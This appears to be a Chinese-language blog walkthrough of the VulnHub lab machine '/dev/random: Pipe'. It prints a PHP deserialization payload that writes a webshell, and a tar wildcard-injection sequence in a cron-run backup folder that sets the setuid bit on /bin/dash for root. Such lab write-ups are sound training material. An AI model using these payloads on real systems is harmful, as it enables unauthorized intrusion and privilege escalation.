oscp——/dev/random: Pipe

0x00 目标资料42

链接

https://www.vulnhub.com/entry/devrandom-pipe,124/

难度推荐 4

  • Web——Webshell 2
  • Webshell——Rootshell 2

环境搭建

VMbox

0x01 信息收集

IP

在这里插入图片描述

端口

在这里插入图片描述

0x02 Web——Webshell

首先访问一下目标的Web页面,看到了是一个需要登录的地方。
在这里插入图片描述
这里尝试使用post,put等进行访问,都无果,当使用一个任意的方法进行请求,可以看到如下内容
在这里插入图片描述
这里有一个链接,可以看到是一个请求,但是暂时不知道用途。
在这里插入图片描述
这里看了一下burp的自动检测,发现这里存在反序列化
在这里插入图片描述
这里对参数进行解码
在这里插入图片描述
在 http://192.168.124.20/scriptz/php.js中可以看到是通过js进行序列化,然后后端php进行反序列化
在这里插入图片描述
在scriptz目录下,可以看到一些内容
在这里插入图片描述
这里我们下载了log.php.BAK文件,然后进行查看
在这里插入图片描述
这里file_put_contents的就是写文件,文件路径是filename,内容是data。这里就可以构造payload了

O:3:"Log":2:{s:8:"filename";s:27:"/var/www/html/scriptz/a.php";s:4:"data";s:35:"<?php echo system($_GET['cmd']); ?>";}

这里构造解释一下,O后面的3应该就是有Log+1
Log=参数的数量
这里的s的意思就是data的长度

反弹一个shell
在这里插入图片描述
获取下pty
在这里插入图片描述
ps aux一下,发现果然pty会记录在进程中
在这里插入图片描述

0x03 Webshll——Rootshell

这里查看了一下
在这里插入图片描述
查看一下/etc/crontab文件,有一个脚本可以查看一下。
在这里插入图片描述
这里参考了大佬的做法

cd /home/rene/backup
echo > --checkpoint=1;
echo > --checkpoint-action=exec=sh\ shell.sh;
echo 'chmod u+s /bin/dash' > shell.sh
chmod +x shell.sh

过一会儿之后执行/bin/dash
在这里插入图片描述
拿到flag
在这里插入图片描述

已标记关键词 清除标记
相关推荐
©️2020 CSDN 皮肤主题: 程序猿惹谁了 设计师:白松林 返回首页